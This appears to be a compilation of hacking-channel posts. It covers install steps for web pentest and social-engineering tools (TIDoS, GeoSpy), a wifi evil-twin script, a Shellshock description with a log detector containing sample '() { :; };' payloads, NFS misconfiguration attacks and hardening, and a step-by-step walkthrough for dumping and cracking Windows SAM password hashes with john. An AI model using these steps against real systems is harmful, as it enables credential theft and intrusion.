UNDERCODE COMMUNITY
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated 2020 repo for web pentesting API

🦑 FEATURES:

1) A complete, versatile framework covering everything from reconnaissance to vulnerability analysis.

2) Has 5 main phases, subdivided into 14 sub-phases, consisting of a total of 108 modules.

3) The Reconnaissance Phase has 50 modules of its own (including active and passive recon and information disclosure modules).

4) The Scanning & Enumeration Phase has 16 modules (including port scans, WAF analysis, etc.).

5) The Vulnerability Analysis Phase has 37 modules (including the most common vulnerabilities in action).

6) Exploits Castle has only 1 exploit (purely developmental).
And finally, Auxiliaries has 4 modules, with more under development.

7) All four phases each have an Auto-Awesome module which automates every module for you.

8) You just need the domain; leave everything else to this tool.
TIDoS has full verbose output support, so you'll know what's going on.

9) Fully user-friendly interaction environment. (no shits)

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :


Presently, for installing globally, you will need to default your Python version to 2.x. However, the work of migration from Python2 to Python3 is already underway.

1) Clone the repository locally and navigate there:

> git clone https://github.com/0xinfection/tidos-framework.git
> cd tidos-framework

2) Install the dependencies:

> chmod +x install
> ./install

🦑 Now let's run the tool:

TIDoS needs some libraries to run, which can be installed via the aptitude or yum package managers.

1) Install the system packages:

> sudo apt-get install libncurses5 libxml2 nmap tcpdump libexiv2-dev build-essential python-pip python-xmpp

2) After these dependencies have finished installing, install the remaining Python package dependencies:

> pip2 install -r requirements.txt

3) That's it. You now have TIDoS at your service. Fire it up using:

> python2 tidos.py

🦑 Docker image:
You can build it from the Dockerfile:

1> git clone https://github.com/0xinfection/tidos-framework.git

2> cd tidos-framework/docker

3> docker build -t tidos .

To run TIDoS:

> docker run --interactive --tty --rm tidos bash
> tidos

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 What is CVE-2014-6271? (Detail)
This vulnerability has been modified since it was last analyzed by the NVD. It is awaiting reanalysis which may result in further changes to the information provided.
> Written by Undercode - Powered by Gov Site

𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

🦑 Current Description

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
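
For defenders, the description above reduces to one recognisable marker: an environment value that begins like a function definition, `() {`. The Python below is an added example (not part of the original post or of any project it mentions) that scans Apache combined-format access log lines for that marker in the two logged headers mod_cgi passes to CGI scripts as HTTP_REFERER and HTTP_USER_AGENT. The log lines, addresses and function names are constructed for illustration, and the pattern is deliberately a little broader than the exact four-character prefix so that spacing variants are reported too.

```python
import re

# Apache "combined" log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'          # quoted field, allowing \" escapes
COMBINED = re.compile(
    r'(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED
)

# A value that starts like a shell function definition. No legitimate
# Referer or User-Agent starts this way, so the prefix alone is the signal.
FUNC_PREFIX = re.compile(r'^\s*\(\)\s*\{')
# Whatever follows the first closing brace is the "trailing string" that the
# vulnerable Bash versions went on to process; kept for triage only.
TRAILING = re.compile(r'\}\s*;?\s*(\S.*)$')

# Constructed sample log lines (documentation address ranges, harmless marker).
SAMPLE_LOG = [
    r'192.0.2.10 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    r'198.51.100.7 - - [25/Sep/2014:10:00:05 +0000] "GET /cgi-bin/status HTTP/1.1" 200 31 "-" "() { :; }; echo constructed-marker"',
    r'203.0.113.5 - - [25/Sep/2014:10:00:09 +0000] "GET /cgi-bin/test.cgi HTTP/1.0" 404 210 "() { :;}; echo constructed-marker" "curl/7.30.0"',
    r'192.0.2.11 - - [25/Sep/2014:10:00:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Tool/1.0 (compatible; () { not at start)"',
]


def find_function_definitions(log_lines):
    """Return one record per logged header value that starts with '() {'."""
    hits = []
    for line in log_lines:
        parsed = COMBINED.match(line)
        if not parsed:
            continue  # not combined format; handle separately in real use
        host, when, request, status, referer, agent = parsed.groups()
        for env_name, value in (("HTTP_REFERER", referer),
                                ("HTTP_USER_AGENT", agent)):
            prefix = FUNC_PREFIX.match(value)
            if not prefix:
                continue
            tail = TRAILING.search(value, prefix.end())
            hits.append({
                "host": host,
                "time": when,
                "request": request,
                "status": int(status),
                "env": env_name,
                "trailing": tail.group(1) if tail else "",
            })
    return hits


if __name__ == "__main__":
    for hit in find_function_definitions(SAMPLE_LOG):
        print("{host} {time} {env} status={status} trailing={trailing!r}".format(**hit))
```

Only the request line, Referer and User-Agent appear in the combined format, so a value carried in any other header is not visible to this check.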

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 The web pentesting script in the latest post by Undercode includes CVE-2014-6271. Verified by UndercOde, so use for learning only 😁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVE identifiers:
MITRE Corporation's documentation defines CVE Identifiers (also called "CVE names", "CVE numbers", "CVE-IDs", and "CVEs") as unique, common identifiers for publicly known information-security vulnerabilities in publicly released software packages.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

Syntax:

1> In order to support CVE IDs beyond CVE-YEAR-9999 (aka the CVE10k problem, cf. the year 10,000 problem), a change was made to the CVE syntax in 2014 and took effect on Jan 13, 2015.

2> The new CVE-ID syntax is variable length and includes:

CVE prefix + Year + Arbitrary Digits

3> NOTE: The variable-length arbitrary digits will begin at four (4) fixed digits and expand with arbitrary digits only when needed in a calendar year, for example, CVE-YYYY-NNNN and if needed CVE-YYYY-NNNNN, CVE-YYYY-NNNNNN, and so on. This also means there will be no changes needed to previously assigned CVE-IDs, which all include a minimum of 4 digits.
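
The variable-length syntax matters in practice because tooling written for four fixed digits silently truncates longer IDs, and plain string sorting puts them in the wrong order. The Python below is an added example (not from the original post): it extracts and orders IDs under the new syntax and shows both failure modes. The CVE-2099-* values are constructed to illustrate the syntax only, and the function names are hypothetical.

```python
import re

# New syntax: "CVE-" + 4-digit year + "-" + four OR MORE digits.
CVE_ID = re.compile(r'\bCVE-(\d{4})-(\d{4,})\b')
# Old fixed-width assumption, shown only to demonstrate how it truncates.
LEGACY_CVE_ID = re.compile(r'\bCVE-(\d{4})-(\d{4})')

# Constructed sample text; the two 2014 IDs are the ones named on this page.
SAMPLE = ("Shellshock is CVE-2014-6271; the incomplete fix is CVE-2014-7169. "
          "Constructed long IDs: CVE-2099-123456, CVE-2099-10000, CVE-2099-9999.")


def parse_cve_id(cve_id):
    """Return (year, sequence) as integers, or None if the ID is malformed."""
    match = CVE_ID.fullmatch(cve_id.strip().upper())
    return (int(match.group(1)), int(match.group(2))) if match else None


def extract_cve_ids(text):
    """Return the unique IDs found in text, ordered by year then sequence."""
    ids = {m.group(0) for m in CVE_ID.finditer(text.upper())}
    return sorted(ids, key=parse_cve_id)


def legacy_extract(text):
    """What a four-digit-only pattern reports for the same text."""
    return [m.group(0) for m in LEGACY_CVE_ID.finditer(text)]


if __name__ == "__main__":
    print("correct order :", extract_cve_ids(SAMPLE))
    print("string sort   :", sorted(extract_cve_ids(SAMPLE)))
    print("legacy pattern:", legacy_extract(SAMPLE))
```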

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to change Xwin's refresh rate, by UndercOde

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) If you are using Red Hat, your X Window configuration file is /etc/X11/XF86Config. Slackware's X Window configuration file is /etc/XF86Config.

🦑 In that file you will see something like this:

# 640x400 @ 70 Hz, 31.5 kHz hsync
Modeline "640x400" 25.175 640 664 760 800 400 409 411 450
# 640x480 @ 60 Hz, 31.5 kHz hsync
Modeline "640x480" 25.175 640 664 760 800 480 491 493 525
# 800x600 @ 56 Hz, 35.15 kHz hsync
ModeLine "800x600" 36 800 824 896 1024 600 601 603 625
# 1024x768 @ 87 Hz interlaced, 35.5 kHz hsync
Modeline "1024x768" 44.9 1024 1048 1208 1264 768 776 784 817 Interlace

# 640x480 @ 72 Hz, 36.5 kHz hsync
Modeline "640x480" 31.5 640 680 720 864 480 488 491 521
# 800x600 @ 60 Hz, 37.8 kHz hsync
Modeline "800x600" 40 800 840 968 1056 600 601 605 628 +hsync +vsync

# 800x600 @ 72 Hz, 48.0 kHz hsync
Modeline "800x600" 50 800 856 976 1040 600 637 643 666 +hsync +vsync
# 1024x768 @ 60 Hz, 48.4 kHz hsync
Modeline "1024x768" 65 1024 1032 1176 1344 768 771 777 806 -hsync -vsync

# 1024x768 @ 70 Hz, 56.5 kHz hsync
Modeline "1024x768" 75 1024 1048 1184 1328 768 771 777 806 -hsync -vsync
# 1280x1024 @ 87 Hz interlaced, 51 kHz hsync
Modeline "1280x1024" 80 1280 1296 1512 1568 1024 1025 1037 1165 Interlace

2) These lines control the settings of your graphics card.

> For example, the following comment line notes that the resolution is 1280x1024, the refresh rate is 76 Hz and the line scan frequency is 81.13 kHz:
# 1280x1024 @ 76 Hz, 81.13 kHz hsync
The graphics card is set by this line:
Modeline "1280x1024" 135 1280 1312 1416 1664 1024 1027 1030 1064

3) The meaning of each item in this line is as follows (from left to right):

> mode line, resolution, pixel frequency (megahertz), number of pixels per line, clock cycle at which the line synchronization (blanking) pulse starts, clock cycle at which the line synchronization (blanking) pulse ends, the total number of clock cycles per line, the number of image lines per frame, the scanning line at which the frame synchronization pulse starts, the scanning line at which the frame synchronization pulse ends, and the number of scanning lines per frame.

4) Adjust these numbers to make the most of your graphics card and monitor.

> For example, if your graphics card has a megabyte of memory, you can set it to a resolution of 1152x900. :-) What you need to be careful about is checking the scan frequency allowed by your monitor. Some monitors will burn out the line scan transistor when they receive scan sync pulses that are too high in frequency. I have burned a display.

5) The transistor is not very easy to buy. The line scan transistor of a color TV is usually not usable: its frequency is too low and its power is not high enough. :-(

> The next question is what pixel frequency your graphics card can use. For example, the above line requires 135 MHz, but if your card only supports 125 MHz, the line is over the card's limit.

6) If there are multiple mode lines in your configuration file for the resolution you want, you can comment out the other, lower-frequency mode lines with #, leaving only the frequency you want. This is how you change the scanning frequency.
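
The frequencies in the comment lines follow directly from the mode line numbers: line frequency is the pixel clock divided by the clock cycles per line, and refresh rate is the line frequency divided by the scanning lines per frame (doubled for Interlace modes). The Python below is an added example, not part of the original post, that computes both and checks a mode line against a card and monitor before it is enabled. The card and monitor limits passed in are hypothetical values that must come from the hardware documentation.

```python
import shlex


def parse_modeline(line):
    """Parse one XF86Config Modeline and derive its scan frequencies."""
    tokens = shlex.split(line)            # handles the quoted mode name
    if len(tokens) < 11 or tokens[0].lower() != "modeline":
        raise ValueError("not a Modeline entry: %r" % line)
    clock_mhz = float(tokens[2])
    (hdisp, hsync_start, hsync_end, htotal,
     vdisp, vsync_start, vsync_end, vtotal) = map(int, tokens[3:11])
    flags = [t.lower() for t in tokens[11:]]
    hsync_khz = clock_mhz * 1000.0 / htotal      # lines per second / 1000
    refresh_hz = hsync_khz * 1000.0 / vtotal     # frames per second
    if "interlace" in flags:
        refresh_hz *= 2                          # two fields per frame
    return {
        "name": tokens[1].strip(),
        "clock_mhz": clock_mhz,
        "hsync_khz": hsync_khz,
        "refresh_hz": refresh_hz,
        "flags": flags,
    }


def check_mode(mode, card_max_clock_mhz, monitor_hsync_khz, monitor_refresh_hz):
    """Return a list of reasons this mode must not be used (empty if OK)."""
    problems = []
    if mode["clock_mhz"] > card_max_clock_mhz:
        problems.append("pixel clock %.1f MHz exceeds card limit %.1f MHz"
                        % (mode["clock_mhz"], card_max_clock_mhz))
    low, high = monitor_hsync_khz
    if not low <= mode["hsync_khz"] <= high:
        problems.append("hsync %.2f kHz outside monitor range %.1f-%.1f kHz"
                        % (mode["hsync_khz"], low, high))
    low, high = monitor_refresh_hz
    if not low <= mode["refresh_hz"] <= high:
        problems.append("refresh %.2f Hz outside monitor range %.1f-%.1f Hz"
                        % (mode["refresh_hz"], low, high))
    return problems


# The 1280x1024 line discussed above.
EXAMPLE = 'Modeline "1280x1024" 135 1280 1312 1416 1664 1024 1027 1030 1064'

if __name__ == "__main__":
    mode = parse_modeline(EXAMPLE)
    print("%(name)s: %(hsync_khz).2f kHz hsync, %(refresh_hz).2f Hz" % mode)
    # Hypothetical limits: a 125 MHz card and a 30-82 kHz / 50-90 Hz monitor.
    for problem in check_mode(mode, 125.0, (30.0, 82.0), (50.0, 90.0)):
        print("DO NOT USE:", problem)
```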

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Infrared devices in Linux, full, by UndercOde
This article mainly introduces the relationship between Infrared and Linux, and describes the types of Infrared and the protocols and architectures supported by Linux Infrared. Linux IrDA uses IrDA infrared wireless transmission to communicate with peripheral devices. These devices include printers, modems, fax machines, mobile phones, and today's applications on PDAs.

🦑 The types of Infrared include:

1) SIR: Standard IR - 115200 bps (emulates a serial port)

2) MIR: Middle IR - 1.15 Mbps

3) FIR: Fast IR - 4 Mbps

4) VFIR: Very Fast IR - 16 Mbps

5) Dongle: Infrared adapters for the serial port


🦑 Linux Infrared supported protocols:
The protocols supported by Linux IrDA include:

1) IrLAP

2) IrLMP

3) IrIAS

4) IrIAP

5) IrLPT - transfers between printers

6) IrCOMM - emulates serial and parallel ports

7) IrOBEX - object (file etc.) transmission

8) IrLAN - infrared network device (HTTP etc.)

9) IrSocket

🦑 The architecture of IrMC Linux Infrared:

Since its development in 1997, Linux IrDA is basically divided into two parts:

1) Linux-IrDA source code integrated in the Linux kernel, kernel version 2.2.x ~

Directories:
  /usr/src/linux/net/irda (protocol stuff)
  /usr/src/linux/drivers/net/irda (device drivers)
  /usr/src/linux/include/net/irda (header files)


2) Linux-IrDA tools.
PS. It is currently in an experimental stage.

🦑 Linux system settings:

1) Edit file: /etc/conf.modules

#Irda
alias tty-ldisc-11 irtty
alias char-major-161 ircomm-tty
# post-install ircomm-tty /etc/rc.d/init.d/rc.irda autostart
# post-remove ircomm-tty /etc/rc.d/init.d/rc.irda autostop


2) Run: depmod -a


Edit the file under /etc/IrDA/; which one depends on your IR chip drivers.


3) Run: depmod -a

🦑 HOW TO ?

Example case: Dell Inspiron 5000

1) Make sure the BIOS has IrDA enabled, and record the resources the system allocates (IRQ, DMA, I/O port).


2) When recompiling the kernel with make menuconfig, enable the IrDA modules and check the protocols that need to be supported.

3) Install the irda-utils RPM:

> irmanager: Detect peripheral infrared devices
irattach: Enable (mount) infrared
irdadump: Monitor the transmission between infrared devices
irdaping: Ping an infrared peripheral device
irkbd: Infrared keyboard

4) Set up the system with reference to the previous section:

vi /etc/rc.config (set START_IRDA=yes)

ln -s /etc/rc.config /etc/rc.d/rd3.d/S99irda

mknod /dev/irnine c 161 0

ln -s /dev/pilot /etc/irnine

E N J O Y
Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 All Linux commands: bzip2

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Function description: Compression program for .bz2 files.

2) Syntax: bzip2 [-cdfhkLstvVz] [--repetitive-best] [--repetitive-fast] [-compression level] [files to be compressed]

3) Supplementary explanation: bzip2 uses a new compression algorithm, and its compression effect is better than that of the traditional LZ77/LZ78 compression algorithms. If you do not add any parameters, bzip2 will generate a .bz2 compressed file and delete the original file.

🦑 Parameters:

 -c or --stdout  Send compressed and decompressed results to standard output.

 -d or --decompress  Perform decompression.

 -f or --force  When compressing or decompressing, if the output file has the same name as an existing file, bzip2 will not overwrite the existing file by default. To overwrite it, use this parameter.

 -h or --help  Display help.

 -k or --keep  bzip2 deletes the original file after compression or decompression. To keep the original file, use this parameter.

 -s or --small  Reduce the amount of memory used during program execution.

 -t or --test  Test the integrity of the .bz2 compressed file.

 -v or --verbose  Display detailed information when compressing or decompressing files.

 -z or --compress  Force compression.

 -L, --license, -V or --version  Display version information.

 --repetitive-best  If there is repeated data in the file, you can use this parameter to improve the compression effect.

 --repetitive-fast  If there is repeated data in the file, this parameter can be used to speed up the execution.

 -compression level  Block size when compressing.

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
This pic: source wiki, verified & posted by UndercOde. ALL CVE TYPES, 2020 analysis
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 topic: Geolocation Spy (GeoSpy) is an OSINT analysis and research tool that is used to track and execute intelligent social engineering attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain confidential information, such as the status of sessions of their websites or services, and control their users through their browser without their knowledge, but it evolves with the aim of helping government organizations, companies and researchers to track cybercriminals.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) git clone https://github.com/entynetproject/geospy

2) cd geospy

3) chmod +x install.sh

4) ./install.sh

🦑 Commands:

Geolocation Spy execution:
> geospy -h

usage: geospy [-h] [-v] [-u URL] [-p PORT] [-ak ACCESSKEY] [-l LOCAL] [-n]
              [-ic INJC] [-ud]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     Put the web page URL to clone.
  -p PORT, --port PORT  Insert your port.
  -ak ACCESSKEY, --accesskey ACCESSKEY
                        Insert your custom Access Key.
  -n, --ngrok           Insert your ngrok Authtoken.
  -ic INJC, --injectcode INJC
                        Insert your custom REST API path.
  -ud, --update         Update GeoSpy to the latest version.

🦑 Tested by UndercOde on:

Ubuntu
Debian

▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Security issues with NFS services, full, by UndercOde:
The NFS service on Unix systems is equivalent to the file sharing service on MS systems. Some people may think that this is an inappropriate analogy, but the two have surprisingly similar security issues.

> Just as many security problems on NT/Windows machines come from shared resources, misconfiguration of the NFS service can also allow your system to be taken over by intruders. NFS is built on the RPC (Remote Procedure Call) mechanism. Similarly, NT services built on the RPC mechanism are not secure; attacks on MS shared resources are currently the most popular NT attack method on the Internet, and attacks on NFS are likewise the most common method against Unix platform machines.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

The insecurity of NFS is mainly reflected in the following 4 aspects:

1) The NFS access control mechanism is difficult for novices to handle, and precise control objectives are difficult to achieve.

2) NFS has no real user authentication mechanism; it only has an authentication mechanism for RPC/Mount requests.

3) Earlier versions of NFS allow unauthorized users to obtain a valid file handle.

4) In an RPC remote call, a SUID program has superuser privileges.


Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Part 2: Security issues with NFS services, full, by UndercOde
We discuss them from these aspects:

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) By default on most Unix systems, when exporting a directory, if you do not specify read-only, the directory is writable. The NFS access control file is prone to misconfiguration; in many cases it is configured to be accessible by any machine on the Internet. Remote users can use the following command to find out whether there is a configuration vulnerability in NFS. This command is a necessary step for almost all NFS attacks:

> showmount -e www.examl....com

The possible results are as follows:
/usr (everyone)
/export/target1 -access=target2
/export/target2 -access=target1

2) You can mount the /usr directory on this NFS server to a local directory:
# mount www.exampl...com:/usr /tmp

3) This shows that the /usr directory can be mounted by any machine, and may even have write permissions; the /export/target1 directory specifies host access restrictions, and a client must be a member of target2.exam,...com or a member of the netgroup of target2 to mount it.

4) Most intruders first use this command to query the NFS vulnerability on the target, just like the net view command for NT. It is worth noting that the popular approach to intrusion has changed from attacking a predetermined target to intruding wherever the other side offers an opportunity.

5) The intruder may write a script or a program to scan a large range of addresses, list the results and report back. Therefore, correct configuration is very important. On the Internet, there are a lot of machines with wrong NFS settings. This configuration is generally stored in the /etc/exports file or /etc/dfs/dfstab.

6) The user authentication in a request from the client consists of the user's UID and the GID of the group to which the user belongs. This type of file access check is of course safe for systems without NFS; but on the Internet, the root user of another machine has the right to set up such a UID on their own machine, and the NFS server does not care whether the UID comes from its own machine or not: as long as the UID matches, it gives this user access to the file.

🦑 Example:

> For example, the directory /home/frank can only be opened for reading and writing by a user with a UID of 501, and this directory can be mounted by a remote machine. The root user of that machine then adds a user with a UID of 501, logs in as this user and mounts the directory, and gets the equivalent of user 501's permissions on the NFS server to read and write /home/frank. To solve this problem, you must properly configure exports, limit the client host addresses, and explicitly set the rw=host option, the ro (read-only) option, and the access=host option.

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 The purpose is to make NFS file handles difficult to guess. This information is generated by the stat(2) system call. Unfortunately, a function used by this call, vn_stat(), has a problem:

...
sb->st_gen = vap->va_gen;   /* generation number copied out for every caller */
sb->st_blocks = vap->va_bytes / S_BLKSIZE;
return (0);
}

🦑 The above program code exposes all of the information in the generated st_gen number; using this information, unauthorized users can get the handle of the file. The correct program should only allow this information to be exposed to root:

...
sb->st_flags = vap->va_flags;
if (suser(p->p_ucred, &p->p_acflag)) {
    sb->st_gen = 0;             /* caller is not root: hide the generation number */
} else {
    sb->st_gen = vap->va_gen;   /* caller is root */
}
sb->st_blocks = vap->va_bytes / S_BLKSIZE;
return (0);
}

In this way, if the caller is not root, he can only get 0.

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Security issues with NFS services
> The most dangerous error is to export a directory containing SUID programs when those files have execute permission. A SUID program itself is equivalent to the superuser.

🦑 Solution:

1) As with the solution of removing all shares on NT, the best solution is to disable the NFS service, or to use the AFS service (Andrew File System) instead.

2) If you must run NFS, do not allow a single machine to be both client and server.

3) Export file systems as read-only.

4) Prohibit the execution of programs with the SUID attribute.

5) Do not export home directories.

6) Do not export with the execute attribute.

7) Use some secure NFS implementation (though not necessarily really secure).
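
The export rules from Part 2 (limit client hosts with access=host, set ro or rw=host explicitly) and items 3 and 5 of the list above can be checked mechanically. The Python below is an added example, not part of the original posts: it audits an exports file written in the older "-option" syntax that the showmount output above uses. The sample file and the finding names are constructed, and treating anything under /home as a home directory is an assumption; exports files in the Linux "host(options)" syntax need a different parser.

```python
# Constructed sample in the older "-option[,option]" exports syntax.
SAMPLE_EXPORTS = """\
# constructed sample, not from a real host
/usr
/export/target1   -access=target2
/export/docs      -ro,access=target1:target2
/home/frank       -rw=target1,access=target1
/export/tools     -ro
"""

FINDING_TEXT = {
    "open-mount": "no access= list, so any host can mount it",
    "writable": "neither ro nor rw=host is set, so it is exported writable",
    "home-directory": "a home directory is exported",
}


def parse_exports(text):
    """Return [(directory, {option: [hosts]})] for each export line."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        directory, *option_fields = line.split()
        options = {}
        for field in option_fields:
            for item in field.lstrip("-").split(","):
                key, _, value = item.partition("=")
                if key:
                    # host lists are colon-separated: access=a:b
                    options[key] = [h for h in value.split(":") if h]
        entries.append((directory, options))
    return entries


def audit_entry(directory, options):
    """Return the finding codes that apply to one export."""
    findings = []
    if not options.get("access"):
        findings.append("open-mount")
    if "ro" not in options and not options.get("rw"):
        findings.append("writable")
    # Assumption: home directories live under /home on this system.
    if directory == "/home" or directory.startswith("/home/"):
        findings.append("home-directory")
    return findings


def audit_exports(text):
    """Map each exported directory to its list of finding codes."""
    return {d: audit_entry(d, o) for d, o in parse_exports(text)}


if __name__ == "__main__":
    for directory, findings in audit_exports(SAMPLE_EXPORTS).items():
        if not findings:
            print("%-18s ok" % directory)
        for code in findings:
            print("%-18s %s: %s" % (directory, code, FINDING_TEXT[code]))
```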

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Updated Wifi hack 2019: automates various wireless networks

🦑 Features:

1) Capture victims' traffic.

2) MAC address spoofing.

3) Set-up honeypot and evil twin attacks.

4) Show the list of in range access points.

5) Wireless adapter|card|dongle power amplification.

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/aress31/wirespy

2) cd wirespy

3) chmod +x wirespy.sh

4) Run the script with root privileges:

> sudo ./wirespy.sh

Attacks:
eviltwin > launch an evil twin attack
honeypot > launch a rogue access point attack

🦑 Commands:

clear > clear the terminal
help > list available commands
quit|exit > exit the program
apscan > show all wireless access points nearby
leases > display DHCP leases
powerup > power wireless interface up (may cause issues)
start capture > start packet capture (tcpdump)
stop capture > stop packet capture (tcpdump)
status > show modules status

> Compatible with rooted Termux

Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Cracking Windows User Passwords

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) The user names and passwords of a Windows system are stored in a SAM (Security Account Manager) file.

2) In Windows systems based on the NT kernel, including Windows 7 and later versions, this file is saved in the "C:\Windows\System32\Config" directory. For security reasons, Microsoft has added some extra security measures to protect this file. First, after the operating system starts, the SAM file is locked. This means that the user cannot open or copy the SAM file while the operating system is running. In addition to locking, the entire SAM file is encrypted and invisible.


3) Use the John the Ripper tool to crack Windows user passwords.

a) Check the hard drives in the current system:

> fdisk -l
The output shows that there is one disk in the current system, with only one partition. The file system type is NTFS, and this is the disk on which the Windows system is stored.

b) Mount the hard drive. The commands are as follows:
root@kali:~# mkdir /sda1
root@kali:~# mount /dev/sda1 /sda1/
After executing the above commands, there is no output.

c) Switch directories and enter the location of the Windows SAM file. The command is as follows:
root@kali:~# cd /sda1/WINDOWS/system32/config/
In this directory, you can see the SAM file.

d) Use SamDump2 to extract the SAM file. The command is as follows:
root@kali:/sda1/WINDOWS/system32/config# samdump2 utc system > /root/hash.txt

You can see from the output that the SAM file has been extracted; the contents are redirected to the /root/hash.txt file.

e) Run the john command to carry out the password attack. The command is as follows:
root@kali:/sda1/WINDOWS/system32/config# /usr/sbin/john /root/hash.txt --format=nt
Created directory: /root/.undercode
Loaded 6 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
(Guest)
guesses: 4 time: 0:00:03:13 0.09% (3) (ETA: Mon May 12 06:46:42 2014) c/s: 152605K trying: 2KRIN.P - 2KRIDY8
guesses: 4 time: 0:00:04:26 0.13% (3) (ETA: Mon May 12 04:02:53 2014) c/s: 152912K trying: GR0KUHI - GR0KDN1
guesses: 4 time: 0:00:04:27 0.13% (3) (ETA: Mon May 12 04:15:42 2014) c/s: 152924K trying: HKCUUHT - HKCUGDS

THAT'S IT!
Written by UndercOde
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁